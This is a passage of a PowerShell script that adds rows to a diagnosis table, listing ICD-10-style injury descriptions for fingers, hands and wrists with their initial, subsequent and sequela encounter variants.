nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left little finger with damage to nail","Laceration with foreign body of left little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left little finger with damage to nail","Laceration with foreign body of left little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left little finger with damage to nail","Laceration with foreign body of left little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other finger with damage to nail","Laceration with foreign body of other finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other finger with damage to nail","Laceration with foreign body of other finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of other finger with damage to nail","Laceration with foreign body of other finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified finger with damage to nail","Laceration with foreign body of unspecified finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified finger with damage to nail","Laceration with foreign body of unspecified finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified finger with damage to nail","Laceration with foreign body of unspecified finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right index finger with damage to nail","Puncture wound without foreign body of right index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right index finger with damage to nail","Puncture wound without foreign body of right index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right index finger with damage to nail","Puncture wound without foreign body of right index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left index finger with damage to nail","Puncture wound without foreign body of left index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left index finger with damage to nail","Puncture wound without foreign body of left index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left index finger with damage to nail","Puncture wound without foreign body of left index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right middle finger with damage to nail","Puncture wound without foreign body of right middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right middle finger with damage to nail","Puncture wound without foreign body of right middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right middle finger with damage to nail","Puncture wound without foreign body of right middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left middle finger with damage to nail","Puncture wound without foreign body of left middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left middle finger with damage to nail","Puncture wound without foreign body of left middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left middle finger with damage to nail","Puncture wound without foreign body of left middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right ring finger with damage to nail","Puncture wound without foreign body of right ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right ring finger with damage to nail","Puncture wound without foreign body of right ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right ring finger with damage to nail","Puncture wound without foreign body of right ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left ring finger with damage to nail","Puncture wound without foreign body of left ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left ring finger with damage to nail","Puncture wound without foreign body of left ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left ring finger with damage to nail","Puncture wound without foreign body of left ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right little finger with damage to nail","Puncture wound without foreign body of right little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right little finger with damage to nail","Puncture wound without foreign body of right little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right little finger with damage to nail","Puncture wound without foreign body of right little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left little finger with damage to nail","Puncture wound without foreign body of left little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left little finger with damage to nail","Puncture wound without foreign body of left little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left little finger with damage to nail","Puncture wound without foreign body of left little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other finger with damage to nail","Puncture wound without foreign body of other finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other finger with damage to nail","Puncture wound without foreign body of other finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of other finger with damage to nail","Puncture wound without foreign body of other finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified finger with damage to nail","Puncture wound without foreign body of unspecified finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified finger with damage to nail","Puncture wound without foreign body of unspecified finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified finger with damage to nail","Puncture wound without foreign body of unspecified finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right index finger with damage to nail","Puncture wound with foreign body of right index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right index finger with damage to nail","Puncture wound with foreign body of right index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right index finger with damage to nail","Puncture wound with foreign body of right index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left index finger with damage to nail","Puncture wound with foreign body of left index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left index finger with damage to nail","Puncture wound with foreign body of left index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left index finger with damage to nail","Puncture wound with foreign body of left index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right middle finger with damage to nail","Puncture wound with foreign body of right middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right middle finger with damage to nail","Puncture wound with foreign body of right middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right middle finger with damage to nail","Puncture wound with foreign body of right middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left middle finger with damage to nail","Puncture wound with foreign body of left middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left middle finger with damage to nail","Puncture wound with foreign body of left middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left middle finger with damage to nail","Puncture wound with foreign body of left middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right ring finger with damage to nail","Puncture wound with foreign body of right ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right ring finger with damage to nail","Puncture wound with foreign body of right ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right ring finger with damage to nail","Puncture wound with foreign body of right ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left ring finger with damage to nail","Puncture wound with foreign body of left ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left ring finger with damage to nail","Puncture wound with foreign body of left ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left ring finger with damage to nail","Puncture wound with foreign body of left ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right little finger with damage to nail","Puncture wound with foreign body of right little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right little finger with damage to nail","Puncture wound with foreign body of right little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right little finger with damage to nail","Puncture wound with foreign body of right little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left little finger with damage to nail","Puncture wound with foreign body of left little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left little finger with damage to nail","Puncture wound with foreign body of left little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left little finger with damage to nail","Puncture wound with foreign body of left little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other finger with damage to nail","Puncture wound with foreign body of other finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other finger with damage to nail","Puncture wound with foreign body of other finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of other finger with damage to nail","Puncture wound with foreign body of other finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified finger with damage to nail","Puncture wound with foreign body of unspecified finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified finger with damage to nail","Puncture wound with foreign body of unspecified finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified finger with damage to nail","Puncture wound with foreign body of unspecified finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right index finger with damage to nail","Open bite of right index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right index finger with damage to nail","Open bite of right index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right index finger with damage to nail","Open bite of right index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left index finger with damage to nail","Open bite of left index finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left index finger with damage to nail","Open bite of left index finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left index finger with damage to nail","Open bite of left index finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right middle finger with damage to nail","Open bite of right middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right middle finger with damage to nail","Open bite of right middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right middle finger with damage to nail","Open bite of right middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left middle finger with damage to nail","Open bite of left middle finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left middle finger with damage to nail","Open bite of left middle finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left middle finger with damage to nail","Open bite of left middle finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right ring finger with damage to nail","Open bite of right ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right ring finger with damage to nail","Open bite of right ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right ring finger with damage to nail","Open bite of right ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left ring finger with damage to nail","Open bite of left ring finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left ring finger with damage to nail","Open bite of left ring finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left ring finger with damage to nail","Open bite of left ring finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right little finger with damage to nail","Open bite of right little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right little finger with damage to nail","Open bite of right little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right little finger with damage to nail","Open bite of right little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left little finger with damage to nail","Open bite of left little finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left little finger with damage to nail","Open bite of left little finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left little finger with damage to nail","Open bite of left little finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of other finger with damage to nail","Open bite of other finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of other finger with damage to nail","Open bite of other finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of other finger with damage to nail","Open bite of other finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified finger with damage to nail","Open bite of unspecified finger with damage to nail, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified finger with damage to nail","Open bite of unspecified finger with damage to nail, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified finger with damage to nail","Open bite of unspecified finger with damage to nail, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right hand","Unspecified open wound of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right hand","Unspecified open wound of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right hand","Unspecified open wound of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left hand","Unspecified open wound of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left hand","Unspecified open wound of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left hand","Unspecified open wound of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified hand","Unspecified open wound of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified hand","Unspecified open wound of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified hand","Unspecified open wound of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right hand","Laceration without foreign body of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right hand","Laceration without foreign body of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right hand","Laceration without foreign body of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left hand","Laceration without foreign body of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left hand","Laceration without foreign body of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left hand","Laceration without foreign body of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified hand","Laceration without foreign body of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified hand","Laceration without foreign body of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified hand","Laceration without foreign body of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right hand","Laceration with foreign body of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right hand","Laceration with foreign body of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right hand","Laceration with foreign body of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left hand","Laceration with foreign body of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left hand","Laceration with foreign body of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left hand","Laceration with foreign body of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified hand","Laceration with foreign body of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified hand","Laceration with foreign body of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified hand","Laceration with foreign body of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right hand","Puncture wound without foreign body of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right hand","Puncture wound without foreign body of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right hand","Puncture wound without foreign body of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left hand","Puncture wound without foreign body of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left hand","Puncture wound without foreign body of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left hand","Puncture wound without foreign body of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified hand","Puncture wound without foreign body of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified hand","Puncture wound without foreign body of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified hand","Puncture wound without foreign body of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right hand","Puncture wound with foreign body of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right hand","Puncture wound with foreign body of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right hand","Puncture wound with foreign body of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left hand","Puncture wound with foreign body of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left hand","Puncture wound with foreign body of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left hand","Puncture wound with foreign body of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified hand","Puncture wound with foreign body of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified hand","Puncture wound with foreign body of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified hand","Puncture wound with foreign body of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right hand","Open bite of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right hand","Open bite of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right hand","Open bite of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left hand","Open bite of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left hand","Open bite of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left hand","Open bite of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified hand","Open bite of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified hand","Open bite of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified hand","Open bite of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right wrist","Unspecified open wound of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right wrist","Unspecified open wound of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right wrist","Unspecified open wound of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left wrist","Unspecified open wound of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left wrist","Unspecified open wound of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left wrist","Unspecified open wound of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified wrist","Unspecified open wound of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified wrist","Unspecified open wound of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified wrist","Unspecified open wound of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right wrist","Laceration without foreign body of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right wrist","Laceration without foreign body of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right wrist","Laceration without foreign body of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left wrist","Laceration without foreign body of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left wrist","Laceration without foreign body of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left wrist","Laceration without foreign body of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified wrist","Laceration without foreign body of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified wrist","Laceration without foreign body of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified wrist","Laceration without foreign body of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right wrist","Laceration with foreign body of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right wrist","Laceration with foreign body of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right wrist","Laceration with foreign body of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left wrist","Laceration with foreign body of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left wrist","Laceration with foreign body of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left wrist","Laceration with foreign body of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified wrist","Laceration with foreign body of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified wrist","Laceration with foreign body of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified wrist","Laceration with foreign body of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right wrist","Puncture wound without foreign body of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right wrist","Puncture wound without foreign body of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right wrist","Puncture wound without foreign body of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left wrist","Puncture wound without foreign body of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left wrist","Puncture wound without foreign body of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left wrist","Puncture wound without foreign body of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified wrist","Puncture wound without foreign body of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified wrist","Puncture wound without foreign body of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified wrist","Puncture wound without foreign body of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right wrist","Puncture wound with foreign body of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right wrist","Puncture wound with foreign body of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right wrist","Puncture wound with foreign body of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left wrist","Puncture wound with foreign body of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left wrist","Puncture wound with foreign body of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left wrist","Puncture wound with foreign body of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified wrist","Puncture wound with foreign body of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified wrist","Puncture wound with foreign body of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified wrist","Puncture wound with foreign body of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right wrist","Open bite of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right wrist","Open bite of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right wrist","Open bite of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left wrist","Open bite of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left wrist","Open bite of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left wrist","Open bite of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified wrist","Open bite of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified wrist","Open bite of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified wrist","Open bite of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of right wrist","Unspecified fracture of navicular [scaphoid] bone of right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of right wrist","Unspecified fracture of navicular [scaphoid] bone of right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of right wrist","Unspecified fracture of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of right wrist","Unspecified fracture of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of right wrist","Unspecified fracture of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of right wrist","Unspecified fracture of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of right wrist","Unspecified fracture of navicular [scaphoid] bone of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of left wrist","Unspecified fracture of navicular [scaphoid] bone of left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of left wrist","Unspecified fracture of navicular [scaphoid] bone of left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of left wrist","Unspecified fracture of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of left wrist","Unspecified fracture of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of left wrist","Unspecified fracture of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of left wrist","Unspecified fracture of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of left wrist","Unspecified fracture of navicular [scaphoid] bone of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of unspecified wrist","Unspecified fracture of navicular [scaphoid] bone of unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of unspecified wrist","Unspecified fracture of navicular [scaphoid] bone of unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of unspecified wrist","Unspecified fracture of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of unspecified wrist","Unspecified fracture of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of unspecified wrist","Unspecified fracture of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of unspecified wrist","Unspecified fracture of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of navicular [scaphoid] bone of unspecified wrist","Unspecified fracture of navicular [scaphoid] bone of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Displaced fracture of distal pole of navicular 